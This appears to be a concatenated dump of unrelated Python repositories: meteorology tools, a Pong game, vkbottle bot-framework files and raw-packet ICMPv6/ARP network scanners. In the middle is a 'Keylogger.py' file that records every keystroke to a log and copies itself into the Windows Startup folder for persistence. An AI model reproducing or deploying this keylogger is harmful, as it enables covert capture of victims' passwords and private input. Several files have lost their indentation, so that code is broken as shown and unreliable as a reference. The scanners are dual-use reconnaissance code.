print('Td: '+str(Td))
# USAGE: python dewpoint.py T RH
# e.g. python dewpoint.py 10 98
```
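A quick, self-contained sanity check of the Magnus-type approximation above; the constants `a` and `b` are copied from the file, and the quoted result of roughly 9.3 °C is an approximation, not a reference measurement:
```python
import math

# Magnus-type constants, copied from dewpoint.py above
a = 17.271
b = 237.7  # degrees Celsius


def dewpoint(T, RH):
    """Approximate dew point (deg C) from temperature (deg C) and RH (%)."""
    g = (a * T / (b + T)) + math.log(RH / 100.0)
    return (b * g) / (a - g)


if __name__ == '__main__':
    # 20 deg C at 50 % relative humidity -> dew point of about 9.3 deg C
    print(round(dewpoint(20.0, 50.0), 1))
```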
#### File: py_meteo_tools/py_meteo_tools/rebin.py
```python
import numpy as np
def rebin(a, new_shape):
"""
PURPOSE:
Resizes a 2d array by averaging or repeating elements,
new dimensions must be integral factors of original dimensions
INPUT:
a : array_like
Input array.
new_shape : tuple of int
Shape of the output array
OUTPUT:
rebinned_array : ndarray
If the new shape is smaller of the input array, the data are averaged,
if the new shape is bigger array elements are repeated
EXAMPLES:
>>> a = np.array([[0, 1], [2, 3]])
>>> b = rebin(a, (4, 6)) #upsize
>>> b
array([[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[2, 2, 2, 3, 3, 3],
[2, 2, 2, 3, 3, 3]])
>>> c = rebin(b, (2, 3)) #downsize
>>> c
array([[ 0. , 0.5, 1. ],
[ 2. , 2.5, 3. ]])
"""
M, N = a.shape
m, n = new_shape
    if m<M:
        # integer division: the docstring requires new dims to be integral factors
        return a.reshape((m,M//m,n,N//n)).mean(3).mean(1)
    else:
        return np.repeat(np.repeat(a, m//M, axis=0), n//N, axis=1)
if __name__ == '__main__':
pass
```
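A minimal standalone sketch of why the `reshape(...).mean(3).mean(1)` trick in `rebin` averages non-overlapping blocks; the 4×4 input values are only illustrative:
```python
import numpy as np

a = np.arange(16).reshape(4, 4)

# Splitting each axis into (blocks, elements-per-block) turns every 2x2 tile
# into its own sub-array; averaging over the in-block axes yields the tile means.
blocks = a.reshape(2, 2, 2, 2)  # (row-blocks, rows-per-block, col-blocks, cols-per-block)
downsampled = blocks.mean(axis=3).mean(axis=1)

print(downsampled)
# [[ 2.5  4.5]
#  [10.5 12.5]]
```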
#### File: py_meteo_tools/py_meteo_tools/skewt_logp.py
```python
import sys
import math
import numpy as np
import pylab as pl
# most of the code adapted from pywrfplot
# http://code.google.com/p/pywrfplot/
# PURPOSE: plot raw data of Temperature and Dewpoint in skewT-log(p)-diagram
# define constants
skewness = 37.5
# Defines the ranges of the plot, do not confuse with P_bot and P_top
P_b = 105000.
P_t = 10000.
dp = 100.
plevs = np.arange(P_b,P_t-1,-dp)
T_zero = 273.15
P_top = 10**4
P_bot = 10**5
L = 2.501e6 # latent heat of vaporization
R = 287.04 # gas constant air
Rv = 461.5 # gas constant vapor
eps = R/Rv
cp = 1005.
cv = 718.
kappa = (cp-cv)/cp
g = 9.81
# constants used to calculate moist adiabatic lapse rate
# See formula 3.16 in Rogers&Yau
a = 2./7.
b = eps*L*L/(R*cp)
c = a*L/R
def SkewTPlot(filename_soundingdata):
pl.figure()
_isotherms()
_isobars()
_dry_adiabats()
_moist_adiabats()
_mixing_ratio()
_plot_data(filename_soundingdata)
pl.axis([-40,50,P_b,P_t])
pl.xlabel(r'Temperature ($^{\circ}\! C$)')
xticks = np.arange(-40,51,5)
pl.xticks(xticks,['' if tick%10!=0 else str(tick) for tick in xticks])
pl.ylabel('Pressure (hPa)')
yticks = np.arange(P_bot,P_t-1,-10**4)
pl.yticks(yticks,yticks/100)
pl.show()
pl.close()
pl.clf()
def _skewnessTerm(P):
return skewness * np.log(P_bot/P)
def _isotherms():
for temp in np.arange(-100,50,10):
pl.semilogy(temp + _skewnessTerm(plevs), plevs, basey=math.e, \
color = ('blue'), \
linestyle=('solid' if temp == 0 else 'dashed'), linewidth = .5)
return
def _isobars():
for n in np.arange(P_bot,P_t-1,-10**4):
pl.plot([-40,50], [n,n], color = 'black', linewidth = .5)
return
def _dry_adiabats():
for tk in T_zero+np.arange(-30,210,10):
dry_adiabat = tk * (plevs/P_bot)**kappa - T_zero + _skewnessTerm(plevs)
pl.semilogy(dry_adiabat, plevs, basey=math.e, color = 'brown', \
linestyle='dashed', linewidth = .5)
return
def es(T):
"""
PURPOSE:
Returns saturation vapor pressure (Pascal) at temperature T (Celsius)
Formula 2.17 in Rogers&Yau
"""
return 611.2*np.exp(17.67*T/(T+243.5))
def gamma_s(T,p):
"""
PURPOSE:
Calculates moist adiabatic lapse rate for T (Celsius) and p (Pa)
Note: We calculate dT/dp, not dT/dz
See formula 3.16 in Rogers&Yau for dT/dz, but this must be combined with the dry adiabatic lapse rate (gamma = g/cp) and the
inverse of the hydrostatic equation (dz/dp = -RT/pg)
"""
esat = es(T)
wsat = eps*esat/(p-esat) # Rogers&Yau 2.18
numer = a*(T+T_zero) + c*wsat
denom = p * (1 + b*wsat/((T+T_zero)**2))
return numer/denom # Rogers&Yau 3.16
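# Note on _moist_adiabats() below: it integrates temperature along pressure with
# a simple explicit Euler step, temp -= dp * gamma_s(temp, p), where gamma_s is
# dT/dp from above and dp is the (positive) pressure increment defined at the top.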
def _moist_adiabats():
ps = [p for p in plevs if p<=P_bot]
for temp in np.concatenate((np.arange(-40.,10.1,5.),np.arange(12.5,45.1,2.5))):
moist_adiabat = []
for p in ps:
temp -= dp*gamma_s(temp,p)
moist_adiabat.append(temp + _skewnessTerm(p))
pl.semilogy(moist_adiabat, ps, basey=math.e, color = 'green', \
linestyle = 'dashed', linewidth = .5)
return
def _mixing_ratio():
w = np.array([0.1, 0.4, 1, 2, 4, 7, 10, 16, 24, 32])
w=w*10**(-3)
for wi in w:
mr=[]
for pt in plevs:
e = pt * wi / (eps + wi)
T = 243.5/(17.67/np.log(e/611.2) - 1)
mr.append(T + _skewnessTerm(pt))
if pt==100000.0: mr_ticks = T + _skewnessTerm(pt)
pl.semilogy(mr, plevs, basey=math.e, color = 'red', \
linestyle = 'dashed', linewidth = 1.0)
pl.annotate(str(wi*10**3), xy=(mr_ticks, 100000), xytext=(-15.0,5.0), xycoords='data', textcoords='offset points', color='red')
return
def _windbarbs(speed,theta,p): # in kt
x = np.cos(np.radians(270-theta)) # direction only
y = np.sin(np.radians(270-theta)) # direction only
u = x*speed
v = y*speed
for item in zip(p,theta,speed,x,y,u,v):
print(item)
i=0
for pi in p*100:
pl.barbs(45,pi,u[i],v[i])
i=i+1
return
def _plot_data(filename_soundingdata):
p,h,T,Td,rh,m,theta,speed = np.loadtxt(filename_soundingdata,usecols=range(0,8),unpack=True)
pl.semilogy(T+ _skewnessTerm(p*100),p*100,basey=math.e, color=('black'),linestyle=('solid'),linewidth= 1.5)
pl.semilogy(Td+ _skewnessTerm(p*100),p*100,basey=math.e, color=('black'),linestyle=('solid'),linewidth= 1.5)
_windbarbs(speed,theta,p)
return
if __name__ == '__main__':
# sounding data can be downloaded e.g. from http://weather.uwyo.edu/upperair/sounding.html
    # make sure to use only the actual sounding data without header/footer
filename_soundingdata = sys.argv[1]
SkewTPlot(filename_soundingdata)
# USAGE: python skewt_logp.py input_data.txt
``` |
{
"source": "4E756E6F/Hacks",
"score": 3
} |
#### File: 4E756E6F/Hacks/Keylogger.py
```python
import os
import logging
from pynput.keyboard import Listener
from shutil import copyfile
username = os.getlogin()
logging_directory = f"/home/{username}/Desktop"
copyfile('keylogger.py',
f'C:/Users/{username}/AppData/Roaming/Microsoft/Start Menu/Startup/keylogger.py')
logging.basicConfig(filename=f"{logging_directory}/mylog.txt",
level=logging.DEBUG, format="%(asctime)s: %(message)s")
def key_handler(key):
logging.info(key)
with Listener(on_press=key_handler) as listener:
listener.join()
``` |
{
"source": "4E756E6F/Pong_Game",
"score": 4
} |
#### File: 4E756E6F/Pong_Game/pong.py
```python
import pygame
import sys
class Ball:
def __init__(self, screen, color, posX, posY, radius):
self.screen = screen
self.color = color
self.posX = posX
self.posY = posY
self.radius = radius
self.bx = 0
self.by = 0
self.draw_ball()
def draw_ball(self):
pygame.draw.circle(self.screen, self.color,
(self.posX, self.posY), self.radius)
def start_moving(self):
self.bx = 15
self.by = 5
def movement(self):
self.posX += self.bx
self.posY += self.by
class Player:
def __init__(self, screen, color, posX, posY, width, height):
self.screen = screen
self.color = color
self.posX = posX
self.posY = posY
self.width = width
self.height = height
self.draw_player()
def draw_player(self):
pygame.draw.rect(self.screen, self.color, (self.posX,
self.posY, self.width, self.height))
# ? MODULE INITIALIZER
pygame.init()
# ? CONSTANTS
WIDTH = 900
HEIGHT = 780
BACKGROUND_COLOR = (32, 32, 32)
WHITE = (224, 224, 224)
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('PONG')
def paint_background():
screen.fill(BACKGROUND_COLOR)
pygame.draw.line(screen, WHITE, (WIDTH//2, 0), (WIDTH//2, HEIGHT), width=2)
paint_background()
# ? OBJECTS
ball = Ball(screen, WHITE, WIDTH//2, HEIGHT//2, 15)
player_left = Player(screen, WHITE, 15, HEIGHT//2-60, 20, 120)
player_right = Player(screen, WHITE, WIDTH-20-15, HEIGHT//2-60, 20, 120)
# ? VARIABLES
playing = False
# ? MAIN LOOP
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_KP_ENTER:
ball.start_moving()
playing = True
    if playing:
        # * BALL MOVEMENT
        # repaint the scene each frame so the moving ball does not leave a trail
        paint_background()
        player_left.draw_player()
        player_right.draw_player()
        ball.movement()
        ball.draw_ball()
pygame.display.update()
``` |
{
"source": "4eexotel/vkbottle",
"score": 2
} |
#### File: views/bot/message.py
```python
from abc import ABC
from typing import Any, Callable, List, Optional
from vkbottle_types.events import GroupEventType
from vkbottle.api.abc import ABCAPI
from vkbottle.dispatch.dispenser.abc import ABCStateDispenser
from vkbottle.dispatch.handlers import ABCHandler
from vkbottle.dispatch.middlewares import BaseMiddleware, MiddlewareResponse
from vkbottle.dispatch.return_manager.bot import BotMessageReturnHandler
from vkbottle.modules import logger
from vkbottle.tools.dev_tools import message_min
from vkbottle.tools.dev_tools.mini_types.bot import MessageMin
from ..abc_dispense import ABCDispenseView
DEFAULT_STATE_KEY = "peer_id"
class ABCMessageView(ABCDispenseView, ABC):
def __init__(self):
self.state_source_key = DEFAULT_STATE_KEY
self.handlers: List["ABCHandler"] = []
self.middlewares: List["BaseMiddleware"] = []
self.default_text_approximators: List[Callable[[MessageMin], str]] = []
self.handler_return_manager = BotMessageReturnHandler()
async def process_event(self, event: dict) -> bool:
return GroupEventType(event["type"]) == GroupEventType.MESSAGE_NEW
async def handle_event(
self, event: dict, ctx_api: "ABCAPI", state_dispenser: "ABCStateDispenser"
) -> Any:
logger.debug("Handling event ({}) with message view".format(event.get("event_id")))
context_variables = {}
message = message_min(event, ctx_api)
message.state_peer = await state_dispenser.cast(self.get_state_key(event))
for text_ax in self.default_text_approximators:
message.text = text_ax(message)
for middleware in self.middlewares:
response = await middleware.pre(message)
if response == MiddlewareResponse(False):
return []
elif isinstance(response, dict):
context_variables.update(response)
handle_responses = []
handlers = []
for handler in self.handlers:
result = await handler.filter(message)
logger.debug("Handler {} returned {}".format(handler, result))
if result is False:
continue
elif isinstance(result, dict):
context_variables.update(result)
handler_response = await handler.handle(message, **context_variables)
handle_responses.append(handler_response)
handlers.append(handler)
return_handler = self.handler_return_manager.get_handler(handler_response)
if return_handler is not None:
await return_handler(
self.handler_return_manager, handler_response, message, context_variables
)
if handler.blocking:
break
for middleware in self.middlewares:
await middleware.post(message, self, handle_responses, handlers)
class MessageView(ABCMessageView):
def get_state_key(self, event: dict) -> Optional[int]:
return event["object"]["message"].get(self.state_source_key)
```
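The dispatch loop above treats a middleware's `pre()` result either as a `MiddlewareResponse(False)` veto or as a dict merged into the handlers' context variables. A minimal, illustrative middleware written against only the calls visible in this excerpt (the `from_id` check and the class name are assumptions, not part of any documented API):
```python
from vkbottle.dispatch.middlewares import BaseMiddleware, MiddlewareResponse


class IgnoreCommunitiesMiddleware(BaseMiddleware):
    """Illustrative: drop messages sent from community (negative from_id) accounts."""

    async def pre(self, message):
        if getattr(message, "from_id", 0) < 0:
            # MiddlewareResponse(False) makes handle_event() return early.
            return MiddlewareResponse(False)
        # A dict is merged into context_variables and passed to every handler.
        return {"is_human": True}

    async def post(self, message, view, handle_responses, handlers):
        # Runs after all handlers; a convenient place for logging or metrics.
        pass
```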
#### File: http/middleware/abc.py
```python
import typing
from abc import ABC, abstractmethod
HTTPMiddlewareResponse = typing.NewType("HTTPMiddlewareResponse", bool)
class ABCHTTPMiddleware(ABC):
""" Abstract class for http-client middleware
Documentation: https://github.com/timoniq/vkbottle/tree/v3.0/docs/http/http-middleware.md
"""
@abstractmethod
async def pre(
self, method: str, url: str, data: typing.Optional[dict] = None, **kwargs
) -> typing.Optional[HTTPMiddlewareResponse]:
pass
@abstractmethod
async def post(self, response: typing.Any):
pass
```
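A minimal sketch of a concrete subclass of the abstract HTTP middleware above, matching the `pre`/`post` signatures it declares; the import path simply mirrors the file location shown here and the timing behaviour is purely illustrative:
```python
import time
import typing

from vkbottle.http.middleware.abc import ABCHTTPMiddleware


class TimingHTTPMiddleware(ABCHTTPMiddleware):
    """Illustrative: measure how long each outgoing HTTP request takes."""

    def __init__(self) -> None:
        self._started: typing.Optional[float] = None

    async def pre(self, method: str, url: str, data: typing.Optional[dict] = None, **kwargs):
        # No veto to return here; just record the start time.
        self._started = time.monotonic()
        return None

    async def post(self, response: typing.Any):
        if self._started is not None:
            print(f"request finished in {time.monotonic() - self._started:.3f}s")
```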
#### File: tools/dev_tools/auto_reload.py
```python
import os
import sys
from watchgod import awatch
from vkbottle.modules import logger
_startup_cwd = os.getcwd()
def restart():
""" https://github.com/cherrypy/cherrypy/blob/0857fa81eb0ab647c7b59a019338bab057f7748b/cherrypy/process/wspbus.py#L305
"""
args = sys.argv[:]
logger.debug("Restarting: %s" % " ".join(args))
args.insert(0, sys.executable)
if sys.platform == "win32":
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
os.execv(sys.executable, args)
async def watch_to_reload(check_dir: str):
"""
    Coroutine that watches for changes in your code and restarts the process.
:return:
"""
async for _ in awatch(check_dir):
logger.info("Changes were found. Restarting...")
restart()
``` |
{
"source": "4ekin/raw-packet",
"score": 3
} |
#### File: raw_packet/Scanners/icmpv6_scanner.py
```python
from raw_packet.Utils.base import Base
from raw_packet.Utils.network import RawEthernet, RawIPv6, RawICMPv6
from raw_packet.Utils.tm import ThreadManager
# endregion
# region Import libraries
from socket import socket, AF_PACKET, SOCK_RAW, htons
from time import sleep
from random import randint
from typing import Union, Dict, List
# endregion
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region class ICMPv6 scanner
class ICMPv6Scan:
# region Set variables
base: Base = Base()
eth: RawEthernet = RawEthernet()
ipv6: RawIPv6 = RawIPv6()
icmpv6: RawICMPv6 = RawICMPv6()
raw_socket: socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
network_interface: Union[None, str] = None
your_mac_address: Union[None, str] = None
your_ipv6_link_address: Union[None, str] = None
target_mac_address: str = '33:33:00:00:00:01'
results: List[Dict[str, str]] = list()
unique_results: List[Dict[str, str]] = list()
mac_addresses: List[str] = list()
retry_number: int = 3
timeout: int = 3
icmpv6_identifier: int = 0
router_info: Dict[str, Union[int, str]] = dict()
router_search: bool = False
# endregion
# region Sniffer
def _sniff(self) -> None:
"""
Sniff ICMPv6 packets
:return: None
"""
while True:
packets = self.raw_socket.recvfrom(2048)
for packet in packets:
try:
# Parse Ethernet header
ethernet_header = packet[0:14]
ethernet_header_dict = self.eth.parse_header(packet=ethernet_header)
# Parse Ethernet header
assert ethernet_header_dict is not None, 'Not Ethernet packet!'
# Source MAC address is target mac address
if not self.router_search:
if self.target_mac_address != '33:33:00:00:00:01':
assert ethernet_header_dict['source'] == self.target_mac_address, \
'Bad source MAC address!'
# Destination MAC address is your MAC address
if not self.router_search:
assert ethernet_header_dict['destination'] == self.your_mac_address, \
'Bad destination MAC address!'
# Check type of ethernet header
assert ethernet_header_dict['type'] == self.ipv6.header_type, 'Not IPv6 packet!'
# Parse IPv6 header
ipv6_header = packet[14:14 + self.ipv6.header_length]
ipv6_header_dict = self.ipv6.parse_header(ipv6_header)
# Check parse IPv6 header
assert ipv6_header_dict is not None, 'Could not parse IPv6 packet!'
# Check IPv6 next header type
assert ipv6_header_dict['next-header'] == self.icmpv6.packet_type, 'Not ICMPv6 packet!'
# Parse ICMPv6 packet
icmpv6_packet = packet[14 + self.ipv6.header_length:]
icmpv6_packet_dict = self.icmpv6.parse_packet(packet=icmpv6_packet)
# Check parse ICMPv6 packet
assert icmpv6_packet_dict is not None, 'Could not parse ICMPv6 packet!'
if self.router_search:
# 134 Type of ICMPv6 Router Advertisement
assert icmpv6_packet_dict['type'] == 134, 'Not ICMPv6 Router Advertisement packet!'
# Save router information
self.router_info['router_mac_address'] = ethernet_header_dict['source']
self.router_info['router_ipv6_address'] = ipv6_header_dict['source-ip']
self.router_info['flags'] = hex(icmpv6_packet_dict['flags'])
self.router_info['router-lifetime'] = int(icmpv6_packet_dict['router-lifetime'])
self.router_info['reachable-time'] = int(icmpv6_packet_dict['reachable-time'])
self.router_info['retrans-timer'] = int(icmpv6_packet_dict['retrans-timer'])
for icmpv6_ra_option in icmpv6_packet_dict['options']:
if icmpv6_ra_option['type'] == 3:
self.router_info['prefix'] = str(icmpv6_ra_option['value']['prefix']) + '/' + \
str(icmpv6_ra_option['value']['prefix-length'])
if icmpv6_ra_option['type'] == 5:
self.router_info['mtu'] = int(icmpv6_ra_option['value'], 16)
if icmpv6_ra_option['type'] == 25:
self.router_info['dns-server'] = str(icmpv6_ra_option['value']['address'])
# Search router vendor
self.router_info['vendor'] = \
self.base.get_vendor_by_mac_address(self.router_info['router_mac_address'])
else:
# 129 Type of ICMPv6 Echo (ping) reply
assert icmpv6_packet_dict['type'] == 129, 'Not ICMPv6 Echo (ping) reply packet!'
# Check ICMPv6 Echo (ping) reply identifier
if icmpv6_packet_dict['identifier'] == self.icmpv6_identifier:
self.results.append({
'mac-address': ethernet_header_dict['source'],
'ip-address': ipv6_header_dict['source-ip']
})
except AssertionError:
pass
# endregion
# region Sender
def _send(self) -> None:
"""
Send ICMPv6 packets
:return: None
"""
self.your_mac_address: str = self.base.get_interface_mac_address(self.network_interface)
self.your_ipv6_link_address: str = self.base.get_interface_ipv6_link_address(self.network_interface)
send_socket: socket = socket(AF_PACKET, SOCK_RAW)
send_socket.bind((self.network_interface, 0))
if self.router_search:
request: bytes = self.icmpv6.make_router_solicit_packet(ethernet_src_mac=self.your_mac_address,
ipv6_src=self.your_ipv6_link_address)
else:
request: bytes = self.icmpv6.make_echo_request_packet(ethernet_src_mac=self.your_mac_address,
ethernet_dst_mac=self.target_mac_address,
ipv6_src=self.your_ipv6_link_address,
                                                                   ipv6_dst='ff02::1',  # all-nodes multicast, matches target MAC 33:33:00:00:00:01
id=self.icmpv6_identifier)
for _ in range(self.retry_number):
send_socket.send(request)
sleep(0.1)
send_socket.close()
# endregion
# region Scanner
def scan(self, network_interface: str = 'eth0', timeout: int = 3, retry: int = 3,
target_mac_address: Union[None, str] = None, check_vendor: bool = True,
exit_on_failure: bool = True) -> List[Dict[str, str]]:
"""
Find alive IPv6 hosts in local network with echo (ping) request packets
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param target_mac_address: Target MAC address (example: 192.168.0.1)
:param check_vendor: Check vendor of hosts (default: True)
:param exit_on_failure: Exit if alive IPv6 hosts in network not found (default: True)
:return: List of alive hosts in network (example: [{'mac-address': '01:23:45:67:89:0a', 'ip-address': 'fe80::1234:5678:90ab:cdef', 'vendor': 'Apple, Inc.'}])
"""
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
if target_mac_address is not None:
self.base.mac_address_validation(mac_address=target_mac_address, exit_on_failure=True)
self.target_mac_address = target_mac_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
self.icmpv6_identifier = randint(1, 65535)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run _sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Get vendors
if check_vendor:
for result_index in range(len(self.unique_results)):
self.unique_results[result_index]['vendor'] = \
self.base.get_vendor_by_mac_address(self.unique_results[result_index]['mac-address'])
# endregion
# region Return results
if len(self.unique_results) == 0:
if exit_on_failure:
                self.base.print_error('Could not find alive IPv6 hosts on interface: ', self.network_interface)
exit(1)
return self.unique_results
# endregion
# endregion
# region Search IPv6 router
def search_router(self, network_interface: str = 'eth0', timeout: int = 3, retry: int = 3,
exit_on_failure: bool = True) -> Dict[str, Union[int, str]]:
"""
Search IPv6 router in network
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param exit_on_failure: Exit if IPv6 router in network not found (default: True)
:return: IPv6 router information dictionary (example: {'router_mac_address': '01:23:45:67:89:0a', 'router_ipv6_address': 'fe80::1234:5678:90ab:cdef', 'flags': '0x0', 'router-lifetime': 0, 'reachable-time': 0, 'retrans-timer': 0, 'prefix': 'fd00::/64', 'vendor': 'D-Link International'})
"""
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
self.router_search = True
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run _sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return IPv6 router information
if len(self.router_info.keys()) == 0:
if exit_on_failure:
                self.base.print_error('Could not find IPv6 Router on interface: ', self.network_interface)
exit(1)
return self.router_info
# endregion
# endregion
# endregion
```
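A minimal usage sketch for the scanner above; the interface name is an assumption, and sending/sniffing on raw sockets requires root privileges:
```python
from raw_packet.Scanners.icmpv6_scanner import ICMPv6Scan

if __name__ == '__main__':
    icmpv6_scan = ICMPv6Scan()

    # Ping all link-local nodes on 'eth0' and list alive IPv6 hosts.
    for host in icmpv6_scan.scan(network_interface='eth0', timeout=3, retry=3,
                                 exit_on_failure=False):
        print(host['ip-address'], host['mac-address'], host.get('vendor', ''))

    # Listen for a Router Advertisement on the same interface.
    router = icmpv6_scan.search_router(network_interface='eth0', exit_on_failure=False)
    print(router)
```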
#### File: raw_packet/Scanners/scanner.py
```python
from raw_packet.Utils.base import Base
from raw_packet.Scanners.arp_scanner import ArpScan
from raw_packet.Scanners.icmpv6_scanner import ICMPv6Scan
# endregion
# region Import libraries
import xml.etree.ElementTree as ET
import subprocess as sub
from prettytable import PrettyTable
from os.path import dirname, abspath, isfile
from os import remove
from typing import Union, List, Dict
current_path = dirname((abspath(__file__)))
# endregion
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Main class - Scanner
class Scanner:
# region Variables
base: Base = Base()
arp_scan: ArpScan = ArpScan()
icmpv6_scan: ICMPv6Scan = ICMPv6Scan()
nmap_scan_result: str = current_path + '/nmap_scan.xml'
# endregion
# region Init
def __init__(self):
if not self.base.check_installed_software('nmap'):
self.base.print_error('Could not find program: ', 'nmap')
exit(1)
# endregion
# region Apple device selection
def apple_device_selection(self, apple_devices: Union[None, List[List[str]]],
exit_on_failure: bool = False) -> Union[None, List[str]]:
try:
assert apple_devices is not None, 'List of Apple devices is None!'
assert len(apple_devices) != 0, 'List of Apple devices is empty!'
for apple_device in apple_devices:
assert len(apple_device) == 3, \
'Bad list of Apple device, example: [["192.168.0.1", "12:34:56:78:90:ab", "Apple, Inc."]]'
assert (self.base.ip_address_validation(ip_address=apple_device[0]) or
self.base.ipv6_address_validation(ipv6_address=apple_device[0])), \
'Bad list of Apple device, example: [["192.168.0.1", "12:34:56:78:90:ab", "Apple, Inc."]]'
assert self.base.mac_address_validation(mac_address=apple_device[1]), \
'Bad list of Apple device, example: [["192.168.0.1", "12:34:56:78:90:ab", "Apple, Inc."]]'
apple_device: Union[None, List[str]] = None
if len(apple_devices) == 1:
apple_device = apple_devices[0]
self.base.print_info('Only one Apple device found:')
self.base.print_success(apple_device[0] + ' (' + apple_device[1] + ') ', apple_device[2])
if len(apple_devices) > 1:
self.base.print_info('Apple devices found:')
device_index: int = 1
apple_devices_pretty_table = PrettyTable([self.base.cINFO + 'Index' + self.base.cEND,
self.base.cINFO + 'IP address' + self.base.cEND,
self.base.cINFO + 'MAC address' + self.base.cEND,
self.base.cINFO + 'Vendor' + self.base.cEND])
for apple_device in apple_devices:
apple_devices_pretty_table.add_row([str(device_index), apple_device[0],
apple_device[1], apple_device[2]])
device_index += 1
print(apple_devices_pretty_table)
device_index -= 1
current_device_index = input(self.base.c_info + 'Set device index from range (1-' +
str(device_index) + '): ')
if not current_device_index.isdigit():
self.base.print_error('Your input data is not digit!')
return None
if any([int(current_device_index) < 1, int(current_device_index) > device_index]):
self.base.print_error('Your number is not within range (1-' + str(device_index) + ')')
return None
current_device_index = int(current_device_index) - 1
apple_device = apple_devices[current_device_index]
return apple_device
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region IPv4 device selection
def ipv4_device_selection(self, ipv4_devices: Union[None, List[Dict[str, str]]],
exit_on_failure: bool = False) -> Union[None, Dict[str, str]]:
try:
assert ipv4_devices is not None, 'List of IPv4 devices is None!'
assert len(ipv4_devices) != 0, 'List of IPv4 devices is empty!'
for ipv4_device in ipv4_devices:
                assert len(ipv4_device) == 3, \
                    'Bad dict of IPv4 device, example: ' + \
                    '[{"ip-address": "192.168.0.1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
                assert 'ip-address' in ipv4_device.keys(), \
                    'Bad dict of IPv4 device, example: ' + \
                    '[{"ip-address": "192.168.0.1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
                assert self.base.ip_address_validation(ipv4_device['ip-address']), \
                    'Bad dict of IPv4 device, example: ' + \
                    '[{"ip-address": "192.168.0.1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
                assert 'mac-address' in ipv4_device.keys(), \
                    'Bad dict of IPv4 device, example: ' + \
                    '[{"ip-address": "192.168.0.1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
                assert self.base.mac_address_validation(ipv4_device['mac-address']), \
                    'Bad dict of IPv4 device, example: ' + \
                    '[{"ip-address": "192.168.0.1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
                assert 'vendor' in ipv4_device.keys(), \
                    'Bad dict of IPv4 device, example: ' + \
                    '[{"ip-address": "192.168.0.1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
ipv4_device: Union[None, Dict[str, str]] = None
# region IPv4 devices is found
# region Only one IPv4 device found
if len(ipv4_devices) == 1:
ipv4_device: Dict[str, str] = ipv4_devices[0]
self.base.print_info('Only one IPv4 device found:')
self.base.print_success(ipv4_device['ip-address'] + ' (' + ipv4_device['mac-address'] + ') ' +
ipv4_device['vendor'])
# endregion
# region More than one IPv4 device found
            elif len(ipv4_devices) > 1:
self.base.print_success('Found ', str(len(ipv4_devices)), ' IPv4 alive hosts!')
device_index: int = 1
pretty_table = PrettyTable([self.base.info_text('Index'),
self.base.info_text('IPv4 address'),
self.base.info_text('MAC address'),
self.base.info_text('Vendor')])
for ipv4_device in ipv4_devices:
pretty_table.add_row([str(device_index), ipv4_device['ip-address'],
ipv4_device['mac-address'], ipv4_device['vendor']])
device_index += 1
print(pretty_table)
device_index -= 1
current_device_index: Union[int, str] = \
input(self.base.c_info + 'Set device index from range (1-' + str(device_index) + '): ')
assert current_device_index.isdigit(), \
'Your input data is not digit!'
current_device_index: int = int(current_device_index)
assert not any([current_device_index < 1, current_device_index > device_index]), \
'Your number is not within range (1-' + str(device_index) + ')'
current_device_index: int = int(current_device_index) - 1
ipv4_device: Dict[str, str] = ipv4_devices[current_device_index]
# endregion
# endregion
# region IPv4 devices not found
else:
if exit_on_failure:
self.base.print_error('Could not find IPv4 devices!')
exit(1)
# endregion
return ipv4_device
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region IPv6 device selection
def ipv6_device_selection(self, ipv6_devices: Union[None, List[Dict[str, str]]],
exit_on_failure: bool = False) -> Union[None, Dict[str, str]]:
try:
assert ipv6_devices is not None, 'List of IPv6 devices is None!'
assert len(ipv6_devices) != 0, 'List of IPv6 devices is empty!'
for ipv6_device in ipv6_devices:
assert len(ipv6_device) == 3, \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'ip-address' in ipv6_device.keys(), \
